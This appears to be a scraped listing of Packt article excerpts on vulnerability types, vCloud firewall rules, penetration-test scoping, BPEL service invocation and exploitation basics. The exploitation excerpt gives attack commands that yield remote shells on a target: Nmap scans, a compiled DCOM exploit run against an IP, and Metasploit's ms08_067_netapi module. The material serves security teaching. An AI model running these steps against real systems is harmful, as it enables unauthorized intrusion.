checking and validating mechanisms such that the length of the data is not checked or validated against the size of the data storage or resource. Examples: Buffer overflow Overwriting the original data in the memory Security violation and impact: Memory is overwritten with some arbitrary code so that is gains access to programs or corrupts the memory. This will ultimately crash the operating system. An unstable system due to memory corruption may be exploited to get command prompt, or shell access, by injecting an arbitrary code Configuration Weakness Vulnerabilities It is an error due to the improper configuration of system parameters, or leaving the default configuration settings as it is, which may not be secure. Examples: Default security policy configuration File and print access in Internet connection sharing Security violation and impact: Most of the default configuration settings of many software applications are published and are available in the public domain. For example, some applications come with standard default passwords. If they are not secured, they allow an attacker to compromise the system. Configuration weaknesses are also exploited to gain higher privileges resulting in privilege escalation impacts. Exception Handling Vulnerabilities It is an error due to improper setup or coding where the system fails to handle, or properly respond to, exceptional or unexpected data or conditions. Example: SQL Injection Security violation and impact: By injecting exceptional data, user credentials can be captured by an unauthorized entity Input Validation Vulnerabilities It is an error due to a lack of verification mechanisms to validate the input data or contents. Examples: Directory traversal Malformed URLs Security violation and impact: Due to poor input validation, access to system-privileged programs may be obtained. Randomization Vulnerabilities It is an error due to a mismatch in random data or random data for the process. Specifically, these vulnerabilities are predominantly related to encryption algorithms. Examples: Weak encryption key Insufficient random data Security violation and impact: Cryptographic key can be compromised which will impact the data and access security. Resource Vulnerabilities It is an error due to a lack of resources availability for correct operations or processes. Examples: Memory getting full CPU is completely utilized Security violation and impact: Due to the lack of resources the system becomes unstable or hangs. This results in a denial of services to the legitimate users. State Error It is an error that is a result of the lack of state maintenance due to incorrect process flows. Examples: Opening multiple tabs in web browsers Security violation and impact: There are specific security attacks, such as Cross-site scripting (XSS), that will result in user-authenticated sessions being hijacked. Information security professionals need to be aware of the processes involved in identifying system vulnerabilities. It is important to devise suitable countermeasures, in a cost effective and efficient way, to reduce the risk factor associated with the identified vulnerabilities. Some such measures are applying patches supplied by the application vendors and hardening the systems.
Read more
  • 0
  • 0
  • 7042

article-image-securing-vcloud-using-vcloud-networking-and-security-app-firewall
Packt
12 Nov 2013
6 min read
Save for later

Securing vCloud Using the vCloud Networking and Security App Firewall

Packt
12 Nov 2013
6 min read
(For more resources related to this topic, see here.) Creating a vCloud Networking and Security App firewall rule In this article, we will create a VMware vCloud Networking and Security App firewall rule that restricts inbound HTTP traffic destined for a web server: Open the vCloud Networking and Security Manager URL in a supported browser, or it can also be accessed from the vCenter client. Log in to vCloud Networking and Security as admin. In the vCloud Networking and Security Manager inventory pane, go to Datacenters | Your Datacenter. In the right-hand pane, click on the App Firewall tab. Click on the Networks link. On the General tab, click on the + link. Point to the new rule Name cell and click on the + icon. In the rule Name panel, type Deny HTTP in the textbox and click on OK. Point to the Destination cell and click on the + icon. In the input panel, perform the following actions: Go to IP Addresses from the drop-down menu. At the bottom of the panel, click on the New IP Addresses link. In the Add IP Addresses panel, configure an address set that includes the web server. Click on OK. Point to the Service cell and click on the + icon. In the input panel, perform the following actions: Sort the Available list by name. Scroll down and go to the HTTP service checkbox. Click on the blue right-arrow to move the HTTP service from the Available list to the Selected list. Click on OK. Go to the Action cell and click on the + icon. In the input panel, click on Block and Log. Click on OK. Click on the Publish Changes button, located above the rules list, on the green bar. In general, create firewall rules that meet your business needs. In addition, you might consider the following guidelines: Where possible, when identifying the source and destination, take advantage of vSphere groupings in your vCenter Server inventory, such as the datacenter, cluster, and vApp. By writing rules in terms of these groupings, the number of firewall rules is reduced, which makes the rules easier to track and less prone to configuration errors. If a vSphere grouping does not suit your needs because you need to create a more specialized group, take advantage of security groups. Like vSphere groupings, security groups reduce the number of rules that you need to create, making the rules easier to track and maintain. Finally, set the action on the default firewall rules based on your business policy. For example, as a security best practice, you might deny all traffic by default. If all traffic is denied, vCloud Networking and Security App drops all incoming and outgoing traffic. Allowing all traffic by default makes your datacenter very accessible, but also insecure. vCloud Networking and Security App – flow monitoring Flow monitoring is a traffic analysis tool that provides a detailed view of the traffic on your virtual network and that passed through a vCloud Networking and Security App. The flow monitoring output defines which machines are exchanging data and over which application. This data includes the number of sessions, packets, and bytes transmitted per session. Session details include sources, destinations, direction of sessions, applications, and ports used. Session details can be used to create firewall rules to allow or block traffic. You can use flow monitoring as a forensic tool to detect rogue services and examine outbound sessions. The main advantages of flow monitoring are: You can easily analyze inter-VM traffic Dynamic rules can be created right from the flow monitoring console You can use it for debugging network related problems as you can enable logging for every individual virtual machine on an as-needed basis You can view traffic sessions inspected by a vCloud Networking and Security App within the specified time span. The last 24 hours of data are displayed by default; the minimum time span is 1 hour, and the maximum is 2 weeks. The bar at the top of the page shows the percentage of allowed traffic in green and blocked traffic in red. Examining flow monitoring statistics Let us examine the statistics for the Top Flows, Top Destinations, and Top Sources categories. Open the vCloud Networking and Security Manager URL in a supported browser. Log in to vCloud Networking and Security as admin. In the vCloud Networking and Security Manager inventory pane, go to Datacenters | Your Datacenter. In the right-hand pane, click on the Network Virtualization link. Click on the Networks link. In the networks list, click on the network where you want to monitor the flow. Click on the Flow Monitoring button. Verify that Flow Monitoring | Summary is selected. On the far right side of the page, across from the Summary and Details links, click on the Time Interval Change link. On the Time Interval panel, select the Last 1 week radio button and click on Update. Verify that the Top Flows button is selected. Use the Top Flows table to determine which flow has the highest volume of bytes and which flow has the highest volume of packets. Use the mouse wheel or the vertical scroll bar to view the graph. Point to the apex of three different colored lines and determine which network protocol is reported. Scroll to the top of the form and click on the Top Destinations button. Use the Top Destinations table to determine which destination has the highest volume of incoming bytes and which destination has the highest volume of packets. Use the mouse wheel or the vertical scroll bar to view the graph. Scroll to the top of the form and click on the Top Sources button. Use the Top Sources table to determine which source has the highest volume of bytes and which source has the highest volume of packets. Use the mouse wheel or the vertical scroll bar to view the graph. Summary In this article we learned how to create access control policies based on logical constructs such as VMware vCenter Server containers and VMware vCloud Networking and Security Security Groups, but not just physical constructs such as IP addresses. Resources for Article: Further resources on this subject: Windows 8 with VMware View [Article] VMware View 5 Desktop Virtualization [Article] Cloning and Snapshots in VMware Workstation [Article]
Read more
  • 0
  • 0
  • 6953

article-image-assessment-planning
Packt
04 Jan 2016
12 min read
Save for later

Assessment Planning

Packt
04 Jan 2016
12 min read
In this article by Kevin Cardwell the author of the book Advanced Penetration Testing for Highly-Secured Environments - Second Edition, discusses the test environment and how we have selected the chosen platform. We will discuss the following: Introduction to advanced penetration testing How to successfully scope your testing (For more resources related to this topic, see here.) Introduction to advanced penetration testing Penetration testing is necessary to determine the true attack footprint of your environment. It may often be confused with vulnerability assessment and thus it is important that the differences should be fully explained to your clients. Vulnerability assessments Vulnerability assessments are necessary for discovering potential vulnerabilities throughout the environment. There are many tools available that automate this process so that even an inexperienced security professional or administrator can effectively determine the security posture of their environment. Depending on scope, additional manual testing may also be required. Full exploitation of systems and services is not generally in scope for a normal vulnerability assessment engagement. Systems are typically enumerated and evaluated for vulnerabilities, and testing can often be done with or without authentication. Most vulnerability management and scanning solutions provide actionable reports that detail mitigation strategies such as applying missing patches, or correcting insecure system configurations. Penetration testing Penetration testing expands upon vulnerability assessment efforts by introducing exploitation into the mix The risk of accidentally causing an unintentional denial of service or other outage is moderately higher when conducting a penetration test than it is when conducting vulnerability assessments. To an extent, this can be mitigated by proper planning, and a solid understanding of the technologies involved during the testing process. Thus, it is important that the penetration tester continually updates and refines the necessary skills. Penetration testing allows the business to understand if the mitigation strategies employed are actually working as expected; it essentially takes the guesswork out of the equation. The penetration tester will be expected to emulate the actions that an attacker would attempt and will be challenged with proving that they were able to compromise the critical systems targeted. The most successful penetration tests result in the penetration tester being able to prove without a doubt that the vulnerabilities that are found will lead to a significant loss of revenue unless properly addressed. Think of the impact that you would have if you could prove to the client that practically anyone in the world has easy access to their most confidential information! Penetration testing requires a higher skill level than is needed for vulnerability analysis. This generally means that the price of a penetration test will be much higher than that of a vulnerability analysis. If you are unable to penetrate the network you will be ensuring your clientele that their systems are secure to the best of your knowledge. If you want to be able to sleep soundly at night, I recommend that you go above and beyond in verifying the security of your clients. Advanced penetration testing Some environments will be more secured than others. You will be faced with environments that use: Effective patch management procedures Managed system configuration hardening policies Multi-layered DMZ's Centralized security log management Host-based security controls Network intrusion detection or prevention systems Wireless intrusion detection or prevention systems Web application intrusion detection or prevention systems Effective use of these controls increases the difficulty level of a penetration test significantly. Clients need to have complete confidence that these security mechanisms and procedures are able to protect the integrity, confidentiality, and availability of their systems. They also need to understand that at times the reason an attacker is able to compromise a system is due to configuration errors, or poorly designed IT architecture. Note that there is no such thing as a panacea in security. As penetration testers, it is our duty to look at all angles of the problem and make the client aware of anything that allows an attacker to adversely affect their business. Advanced penetration testing goes above and beyond standard penetration testing by taking advantage of the latest security research and exploitation methods available. The goal should be to prove that sensitive data and systems are protected even from a targeted attack, and if that is not the case, to ensure that the client is provided with the proper instruction on what needs to be changed to make it so. A penetration test is a snapshot of the current security posture. Penetration testing should be performed on a continual basis. Many exploitation methods are poorly documented, frequently hard to use, and require hands-on experience to effectively and efficiently execute. At DefCon 19 Bruce "Grymoire" Barnett provided an excellent presentation on "Deceptive Hacking". In this presentation, he discussed how hackers use many of the very same techniques used by magicians. This is exactly the tenacity that penetration testers must assume as well. Only through dedication, effort, practice, and the willingness to explore unknown areas will penetration testers be able to mimic the targeted attack types that a malicious hacker would attempt in the wild. Often times you will be required to work on these penetration tests as part of a team and will need to know how to use the tools that are available to make this process more endurable and efficient. This is yet another challenge presented to today's pentesters. Working in a silo is just not an option when your scope restricts you to a very limited testing period. In some situations, companies may use non-standard methods of securing their data, which makes your job even more difficult. The complexity of their security systems working in tandem with each other may actually be the weakest link in their security strategy. The likelihood of finding exploitable vulnerabilities is directly proportional to the complexity of the environment being tested. Before testing begins Before we commence with testing, there are requirements that must be taken into consideration. You will need to determine the proper scoping of the test, timeframes and restrictions, the type of testing (Whitebox, Blackbox), and how to deal with third-party equipment and IP space. Determining scope Before you can accurately determine the scope of the test, you will need to gather as much information as possible. It is critical that the following is fully understood prior to starting testing procedures: Who has the authority to authorize testing? What is the purpose of the test? What is the proposed timeframe for the testing? Are there any restrictions as to when the testing can be performed? Does your customer understand the difference between a vulnerability assessment and a penetration test? Will you be conducting this test with, or without cooperation of the IT Security Operations Team? Are you testing their effectiveness? Is social engineering permitted? How about denial-of-service attacks? Are you able to test physical security measures used to secure servers, critical data storage, or anything else that requires physical access? For example, lock picking, impersonating an employee to gain entry into a building, or just generally walking into areas that the average unaffiliated person should not have access to. Are you allowed to see the network documentation or to be informed of the network architecture prior to testing to speed things along? (Not necessarily recommended as this may instill doubt for the value of your findings. Most businesses do not expect this to be easy information to determine on your own.) What are the IP ranges that you are allowed to test against? There are laws against scanning and testing systems without proper permissions. Be extremely diligent when ensuring that these devices and ranges actually belong to your client or you may be in danger of facing legal ramifications. What are the physical locations of the company? This is more valuable to you as a tester if social engineering is permitted because it ensures that you are at the sanctioned buildings when testing. If time permits, you should let your clients know if you were able to access any of this information publicly in case they were under the impression that their locations were secret or difficult to find. What to do if there is a problem or if the initial goal of the test has been reached. Will you continue to test to find more entries or is the testing over? This part is critical and ties into the question of why the customer wants a penetration test in the first place. Are there legal implications that you need to be aware of such as systems that are in different countries, and so on? Not all countries have the same laws when it comes to penetration testing. Will additional permission be required once a vulnerability has been exploited? This is important when performing tests on segmented networks. The client may not be aware that you can use internal systems as pivot points to delve deeper within their network. How are databases to be handled? Are you allowed to add records, users, and so on? This listing is not all-inclusive and you may need to add items to the list depending on the requirements of your clients. Much of this data can be gathered directly from the client, but some will have to be handled by your team. If there are legal concerns, it is recommended that you seek legal counsel to ensure you fully understand the implications of your testing. It is better to have too much information than not enough, once the time comes to begin testing. In any case, you should always verify for yourself that the information you have been given is accurate. You do not want to find out that the systems you have been accessing do not actually fall under the authority of the client! It is of utmost importance to gain proper authorization in writing before accessing any of your clients systems. Failure to do so may result in legal action and possibly jail. Use proper judgment! You should also consider that errors and omissions insurance is a necessity when performing penetration testing. Setting limits–nothing lasts forever Setting proper limitations is essential if you want to be successful at performing penetration testing. Your clients need to understand the full ramifications involved, and should be made aware of any residual costs incurred, if additional services beyond those listed within the contract are needed. Be sure to set defined start and end dates for your services. Clearly define the rules of engagement and include IP ranges, buildings, hours, and so on that may need to be tested. If it is not in your rules of engagement documentation, it should not be tested. Meetings should be predefined prior to the start of testing, and the customer should know exactly what your deliverables will be. Rules of engagement documentation Every penetration test will need to start with a rules of engagement document that all involved parties must have. This document should at a minimum cover several items: Proper permissions by appropriate personnel. Begin and end dates for your testing. The type of testing that will be performed. Limitations of testing. What type of testing is permitted? DDOS? Full penetration? Social engineering? These questions need to be addressed in detail. Can intrusive tests as well as unobtrusive testing be performed? Does your client expect cleanup to be performed afterwards or is this a stage environment that will be completely rebuilt after testing has been completed? IP ranges and physical locations to be tested. How the report will be transmitted at the end of the test? (Use secure means of transmission!) Which tools will be used during the test? Do not limit yourself to only one specific tool; it may be beneficial to provide a list of the primary toolset to avoid confusion in the future. For example, we will use the tools found in the most recent edition of the Kali Suite. Let your client know how any illegal data that is found during testing would be handled: law enforcement should be contacted prior to the client. Please be sure to understand fully the laws in this regard before conducting your test. How sensitive information will be handled: you should not be downloading sensitive customer information; there are other methods of proving that the clients' data is not secured. This is especially important when regulated data is a concern. Important contact information for both your team and for the key employees of the company you are testing. An agreement of what you will do to ensure the customer's system information does not remain on unsecured laptops and desktops used during testing. Will you need to properly scrub your machine after this testing? What do you plan to do with the information you gathered? Is it to be kept somewhere for future testing? Make sure this has been addressed before you start testing, not after. The rules of engagement should contain all the details that are needed to determine the scope of the assessment. Any questions should have been answered prior to drafting your rules of engagement to ensure there are no misunderstandings once the time comes to test. Your team members need to keep a copy of this signed document on their person at all times when performing the test. Imagine you have been hired to assert the security posture of a client's wireless network and you are stealthily creeping along the parking lot on private property with your gigantic directional Wi-Fi antenna and a laptop. If someone witnesses you in this act, they will probably be concerned and call the authorities. You will need to have something on you that documents you have a legitimate reason to be there. This is one time where having the contact information of the business leaders that hired you will come in extremely handy! Summary In this article, we focused on all that is necessary to prepare and plan for a successful penetration test. We discussed the differences between penetration testing and vulnerability assessments. The steps involved with proper scoping were detailed, as were the necessary steps to ensure all information has been gathered prior to testing. One thing to remember is that proper scoping and planning is just as important as ensuring you test against the latest and greatest vulnerabilities. Resources for Article: Further resources on this subject: Penetration Testing[article] Penetration Testing and Setup[article] BackTrack 4: Security with Penetration Testing Methodology[article]
Read more
  • 0
  • 0
  • 6781

article-image-article-test123
Packt
16 Jul 2014
13 min read
Save for later

test-article

Packt
16 Jul 2014
13 min read
Service Invocation Time for action – creating the book warehousing process Let's create the BookWarehousingBPEL BPEL process: We will open the SOA composite by double-clicking on the Bookstore in the process tree. In the composite, we can see both Bookstore BPEL processes and their WSDL interfaces. We will add a new BPEL process by dragging-and-dropping the BPEL Process service component from the right-hand side toolbar. An already-familiar dialog window will open, where we will specify the BPEL 2.0 version, enter the process name as BookWarehousingBPEL, modify the namespace to http://packtpub.com/Bookstore/BookWarehousingBPEL, and select Synchronous BPEL Process. We will leave all other fields to their default values: Insert image 8963EN_02_03.png Next, we will wire the BookWarehousingBPEL component with the BookstoreABPEL and BookstoreBBPEL components. This way, we will establish a partner link between them. First, we will create the wire to the BookstoreBBPEL component (although the order doesn't matter). To do this, you have to click on the bottom-right side of the component. Once you place the mouse pointer above the component, circles on the edges will appear. You need to start with the circle labelled as Drag to add a new Reference and connect it with the service interface circle, as shown in the following figure: Insert image 8963EN_02_04.png You do the same to wire the BookWarehousingBPEL component with the BookstoreABPEL component: Insert image 8963EN_02_05.png We should see the following screenshot. Please notice that the BookWarehousingBPEL component is wired to the BookstoreABPEL and BookstoreBBPEL components: Insert image 8963EN_02_06.png What just happened? We have added the BookWarehousingBPEL component to our SOA composite and wired it to the BookstoreABPEL and BookstoreBBPEL components. Creating the wires between components means that references have been created and relations between components have been established. In other words, we have expressed that the BookWarehousingBPEL component will be able to invoke the BookstoreABPEL and BookstoreBBPEL components. This is exactly what we want to achieve with our BookWarehousingBPEL process, which will orchestrate both bookstore BPELs. Once we have created the components and wired them accordingly, we are ready to implement the BookWarehousingBPEL process. What just happened? We have implemented the process flow logic for the BookWarehousingBPEL process. It actually orchestrated two other services. It invoked the BookstoreA and BookstoreB BPEL processes that we've developed in the previous chapter. Here, these two BPEL processes acted like services. First, we have created the XML schema elements for the request and response messages of the BPEL process. We have created four variables: BookstoreARequest, BookstoreAResponse, BookstoreBRequest, and BookstoreBResponse. The BPEL code for variable declaration looks like the code shown in the following screenshot: Insert image 8963EN_02_18b.png Then, we have added the <assign> activity to prepare a request for both the bookstore BPEL processes. Then, we have copied the BookData element from inputVariable to the BookstoreARequest and BookstoreBRequest variables. The following BPEL code has been generated: Insert image 8963EN_02_18c.png Next, we have invoked both the bookstore BPEL services using the <invoke> activity. The BPEL source code reads like the following screenshot: Insert image 8963EN_02_18d.png Finally, we have added the <if> activity to select the bookstore with the lowest stock quantity: Insert image 8963EN_02_18e.png With this, we have concluded the development of the book warehousing BPEL process and are ready to deploy and test it. Deploying and testing the book warehousing BPEL We will deploy the project to the SOA Suite process server the same way as we did in the previous chapter, by right-clicking on the project and selecting Deploy. Then, we will navigate through the options. As we redeploy the whole SOA composite, make sure the Overwrite option is selected. You should check if the compilation and the deployment have been successful. Then, we will log in to the Enterprise Manager console, select the project bookstore, and click on the Test button. Be sure to select bookwarehousingbpel_client for the test. After entering the parameters, as shown in the following figure, we can click on the Test Web Service button to initiate the BPEL process, and we should receive an answer (Bookstore A or Bookstore B, depending on the data that we have entered). Remember that our BookWarehousingBPEL process actually orchestrated two other services. It invoked the BookstoreA and BookstoreB BPEL processes. To verify this, we can launch the flow trace (click on the Launch Flow Trace button) in the Enterprise Manager console, and we will see that the two bookstore BPEL processes have been invoked, as shown: Insert image 8963EN_02_19.png An even more interesting view is the flow view, which also shows that both bookstore services have been invoked. Click on BookWarehousingBPEL to open up the audit trail: Insert image 8963EN_02_20.png Understanding partner links When invoking services, we have often mentioned partner links. Partner links denote all the interactions that a BPEL process has with the external services. There are two possibilities: The BPEL process invokes operations on other services. The BPEL process receives invocations from clients. One of the clients is the user of the BPEL process, who makes the initial invocation. Other clients are services, for example, those that have been invoked by the BPEL process, but may return replies. Links to all the parties that BPEL interacts with are called partner links. Partner links can be links to services that are invoked by the BPEL process. These are sometimes called invoked partner links. Partner links can also be links to clients, and can invoke the BPEL process. Such partner links are sometimes called client partner links. Note that each BPEL process has at least one client partner link, because there has to be a client that first invokes the BPEL process. Usually, a BPEL process will also have several invoked partner links, because it will most likely invoke several services. In our case, the BookWarehousingBPEL process has one client partner link and two invoked partner links, BookstoreABPEL and BookstoreBBPEL. You can observe this on the SOA composite design view and on the BPEL process itself, where the client partner links are located on the left-hand side, while the invoked partner links are located on the right-hand side of the design view. Partner link types Describing situations where the service is invoked by the process and vice versa requires selecting a certain perspective. We can select the process perspective and describe the process as requiring portTypeA on the service and providing portTypeB to the service. Alternatively, we select the service perspective and describe the service as offering portTypeA to the BPEL process and requiring portTypeB from the process. Partner link types allow us to model such relationships as a third party. We are not required to take a certain perspective; rather, we just define roles. A partner link type must have at least one role and can have at most two roles. The latter is the usual case. For each role, we must specify a portType that is used for interaction. Partner link types are defined in the WSDLs. If we take a closer look at the BookWarehousingBPEL.wsdl file, we can see the following partner link type definition: Insert image 8963EN_02_22.png If we specify only one role, we express the willingness to interact with the service, but do not place any additional requirements on the service. Sometimes, existing services will not define a partner link type. Then, we can wrap the WSDL of the service and define partner link types ourselves. Now that we have become familiar with the partner link types and know that they belong to WSDL, it is time to go back to the BPEL process definition, more specifically to the partner links. Defining partner links Partner links are concrete references to services that a BPEL business process interacts with. They are specified near the beginning of the BPEL process definition document, just after the <process> tag. Several <partnerLink> definitions are nested within the <partnerLinks> element: <process ...>   <partnerLinks>   <partnerLink ... /> <partnerLink ... />        ...      </partnerLinks>   <sequence>      ... </sequence> </process> For each partner link, we have to specify the following: name: This serves as a reference for interactions via that partner link. partnerLinkType: This defines the type of the partner link. myRole: This indicates the role of the BPEL process itself. partnerRole: This indicates the role of the partner. initializePartnerRole: This indicates whether the BPEL engine should initialize the partner link's partner role value. This is an optional attribute and should only be used with partner links that specify the partner role. We define both roles (myRole and partnerRole) only if the partnerLinkType specifies two roles. If the partnerLinkType specifies only one role, the partnerLink also has to specify only one role—we omit the one that is not needed. Let's go back to our example, where we have defined the BookstoreABPEL partner link type. To define a partner link, we need to specify the partner roles, because it is a synchronous relation. The definition is shown in the following code excerpt: Insert image 8963EN_02_23.png With this, we have concluded the discussion on partner links and partner link types. We will continue with the parallel service invocation. Parallel service invocation BPEL also supports parallel service invocation. In our example, we have invoked Bookstore A and Bookstore B sequentially. This way, we need to wait for the response from the first service and then for the response from the second service. If these services take longer to execute, the response times will be added together. If we invoke both services in parallel, we only need to wait for the duration of the longer-lasting call, as shown in the following screenshot: BPEL has several possibilities for parallel flows, which will be described in detail in Chapter 8, Dynamic Parallel Invocations. Here, we present the basic parallel service invocation using the <flow> activity. Insert image 8963EN_02_24.png To invoke services in parallel, or to perform any other activities in parallel, we can use the <flow> activity. Within the <flow> activity, we can nest an arbitrary number of flows, and all will execute in parallel. Let's try and modify our example so that Bookstore A and B will be invoked in parallel. Time for action – developing parallel flows Let's now modify the BookWarehousingBPEL process so that the BookstoreA and BookstoreB services will be invoked in parallel. We should do the following: To invoke BookstoreA and BookstoreB services in parallel, we need to add the Flow structured activity to the process flow just before the first invocation, as shown in the following screenshot: Insert image 8963EN_02_25.png We see that two parallel branches have been created. We simply drag-and-drop both the invoke activities into the parallel branches: Insert image 8963EN_02_26.png That's all! We can create more parallel branches if we need, by clicking on the Add Sequence icon. What just happened? We have modified the BookWarehousingBPEL process so that the BookstoreA and BookstoreB <invoke> activities are executed in parallel. A corresponding <flow>activity has been created in the BPEL source code. Within the <flow> activity, both <invoke> activities are nested. Please notice that each <invoke> activity is placed within its own <sequence> activity. T his would make sense if we would require more than one activity in each parallel branch. The BPEL source code looks like the one shown in the following screenshot: Insert image 8963EN_02_27.png Deploying and testing the parallel invocation We will deploy the project to the SOA Suite process server the same way we did in the previous sample. Then, we will log in to the Enterprise Manager console, select the project Bookstore, and click on the Test Web Service button. To observe that the services have been invoked in parallel, we can launch the flow trace (click on the Launch Flow Trace button) in the Enterprise Manager console, click on the book warehousing BPEL processes, and activate the flow view, which shows that both bookstore services have been invoked in parallel. Understanding parallel flow To invoke services concurrently, we can use the <flow> construct. In the following example, the three <invoke> operations will perform concurrently: <process ...>    ... <sequence> <!-- Wait for the incoming request to start the process --> <receive ... />   <!-- Invoke a set of related services, concurrently --> <flow> <invoke ... /> <invoke ... /> <invoke ... /> </flow>      ... <!-- Return the response --> <reply ... /> </sequence> </process> We can also combine and nest the <sequence> and <flow> constructs that allow us to define several sequences that execute concurrently. In the following example, we have defined two sequences, one that consists of three invocations, and one with two invocations. Both sequences will execute concurrently: <process ...>    ... <sequence>   <!-- Wait for the incoming request to start the process --> <receive ... />   <!-- Invoke two sequences concurrently --> <flow> <!-- The three invokes below execute sequentially --> <sequence> <invoke ... /> <invoke ... /> <invoke ... /> </sequence> <!-- The two invokes below execute sequentially --> <sequence> <invoke ... /> <invoke ... /> </sequence> </flow>        ... <!-- Return the response --> <reply ... /> </sequence> </process> We can use other activities as well within the <flow> activity to achieve parallel execution. With this, we have concluded our discussion on the parallel invocation. Pop quiz – service invocation Q1. Which activity is used to invoke services from BPEL processes? <receive> <invoke> <sequence> <flow> <process> <reply> Q2. Which parameters do we need to specify for the <invoke> activity? endpointURL partnerLink operationName operation portType portTypeLink Q3. In which file do we declare partner link types? Q4. Which activity is used to execute service invocation and other BPEL activities in parallel? <receive> <invoke> <sequence> <flow> <process> <reply> Summary In this chapter, we learned how to invoke services and orchestrate services. We explained the primary mission of BPEL—service orchestration. It follows the concept of programming-in-the-large. We have developed a BPEL process that has invoked two services and orchestrated them. We have become familiar with the <invoke> activity and understood the service invocation's background, particularly partner links and partner link types. We also learned that from BPEL, it is very easy to invoke services in parallel. To achieve this, we use the <flow> activity. Within <flow>, we can not only nest several <invoke> activities but also other BPEL activities. Now, we are ready to learn about variables and data manipulation, which we will do in the next chapter.  
Read more
  • 0
  • 0
  • 6699
article-image-exploitation-basics
Packt
27 Aug 2013
7 min read
Save for later

Exploitation Basics

Packt
27 Aug 2013
7 min read
(For more resources related to this topic, see here.) Basic terms of exploitation The basic terms of exploitation are explained as follows: Vulnerability: A vulnerability is a security hole in software or hardware, which allows an attacker to compromise a system. A vulnerability can be as simple as a weak password or as complex as a Denial of Service attack. Exploit: An exploit refers to a well-known security flaw or bug with which a hacker gains entry into a system. An exploit is the actual code with which an attacker takes advantage of a particular vulnerability. Payload: Once an exploit executes on the vulnerable system and the system has been compromised, the payload enables us to control the system. The payload is typically attached to the exploit and delivered. Shellcode: This is a set of instructions usually used as a payload when the exploitation occurs. Listener: A listener works as component waiting for an incoming connection. How does exploitation work? We consider the scenario of a computer lab in which we have two students doing work on their computers. After some time one of the students goes out for a coffee break and he responsibly locks down his computer. The password for that particular locked computer is Apple, which is a very simple dictionary word and is a system vulnerability. The other student starts to attempt a password guessing attack against the system of the student who left the lab. This is a classic example of an exploit. The controls that help the malicious user to control the system after successfully logging in to the computer are called the payload. We now come to the bigger question of how exploitation actually works. An attacker basically sends an exploit with an attached payload to the vulnerable system. The exploit runs first and if it succeeds, the actual code of the payload runs. After the payload runs, the attacker gets fully privileged access to the vulnerable system, and then he may download data, upload malware, virus', backdoors, or whatever he wants. A typical process for compromising a system For compromising any system, the first step is to scan the IP address to find open ports and its operating system and services. Then we move on to identifying a vulnerable service and finding an exploit in Metasploit for that particular service. If the exploit is not available in Metasploit, we will go through the Internet databases such as www.securityfocus.com, www.exploitdb.com, www.1337day.com, and so on. After successfully finding an exploit, we launch the exploit and compromise the system. The tools that are commonly used for port scanning are Nmap (Network Mapper), Autoscan, Unicorn Scan, and so on. For example, here we are using Nmap for scanning to show open ports and their services. First open the terminal in your BackTrack virtual machine. Type in nmap –v –n 192.168.0.103 and press Enter to scan. We use the –v parameter to get verbose output and the –n parameter to disable reverse DNS resolutions. Here we can see the results of Nmap, showing three open ports with their services running on them. If we need more detailed information such as the service version or Operating System type, we have to perform an intense scan using Nmap. For an intense scan, we use the command nmap –T4 –A –v 192.168.0.103. This shows us the complete results of the service version and the Operating System type. The next step is to find an exploit according to the service or its version. Here, we can see that the first service running on port number 135 is msrpc, which is known as Microsoft Windows RPC. Now we will learn how to find an exploit for this particular service in Metasploit. Let's open our terminal and type in msfconsole to start Metasploit. On typing in search dcom, it searches all of the Windows RPC related exploits in its database. In the following screenshot, we can see the exploit with its description and also the release date of this vulnerability. We are presented with a list of exploits according to their rank. From the three exploits related to this vulnerability, we select the first one since it is the most effective exploit with the highest rank. Now we have learned the technique of searching for an exploit in Metasploit through the search <service name> command. Finding exploits from online databases If the exploit is not available in Metasploit, then we have to search the Internet exploit databases for that particular exploit. Now we will learn how to search for an exploit on these online services such as www.1337day.com. We open the website and click on the Search tab. As an example, we will search for exploits on the Windows RPC service. Now we have to download and save a particular exploit. For this, just click on the exploit you need. After clicking on the exploit it shows the description of that exploit. Click on Open material to view or save the exploit. The usage of this exploit is provided as a part of the documentation in the exploit code as marked in the following screenshot: Now we will be exploiting our target machine with the particular exploit that we have downloaded. We have already scanned the IP address and found three open ports. The next step would be to exploit one of those ports. As an example, we will target the port number 135 service running on this target machine, which is msrpc. Let us start by compiling the downloaded exploit code. To compile the code, launch the terminal and type in gcc <exploit name with path> -o<exploitname>. For example, here we are typing gcc –dcom –o dcom. After compiling the exploit we have a binary file of that exploit, which we use to exploit the target by running the file in the terminal by typing in ./<filename>. From the preceding screenshot, we can see the requirements for exploiting the target. It requires the target IP address and the ID (Windows version). Let's have a look at our target IP address. We have the target IP address, so let's start the attack. Type in ./dcom 6 192.168.174.129. The target has been exploited and we already have the command shell. Now we check the IP address of the victim machine. Type in ipconfig. The target has been compromised and we have actually gained access to it. Now we will see how to use the internal exploits of Metasploit. We have already scanned an IP address and found three open ports. This time we target port number 445, which runs the Microsoft-ds service. Let us start by selecting an exploit. Launch msfconsole, type in use exploit/windows/smb/ms08_067_netapi, and press Enter. The next step will be to check the options for an exploit and what it requires in order to perform a successful exploitation. We type in show options and it will show us the requirements. We would need to set RHOST ( remote host), which is the target IP address, and let the other options keep their default values. We set up the RHOST or the target address by typing in set RHOST 192.168.0.103. After setting up the options, we are all set to exploit our target. Typing in exploit will give us the Meterpreter shell. References The following are some helpful references that shed further light on some of the topics covered in this article: http://www.securitytube.net/video/1175 http://resources.infosecinstitute.com/system-exploitation-metasploit/ Summary In this article, we covered the basics of vulnerability, a payload, and some tips on the art of exploitation. We also covered the techniques of how to search for vulnerable services and further query the Metasploit database for an exploit. These exploits were then used to compromise the vulnerable system. We also demonstrated the art of searching for exploits in Internet databases, which contain zero-day exploits on software and services. Resources for Article : Further resources on this subject: Understanding the True Security Posture of the Network Environment being Tested [Article] So, what is Metasploit? [Article] Tips and Tricks on BackTrack 4 [Article]
Read more
  • 0
  • 0
  • 6570

article-image-using-client-pivot-point
Packt
17 Jun 2014
6 min read
Save for later

Using the client as a pivot point

Packt
17 Jun 2014
6 min read
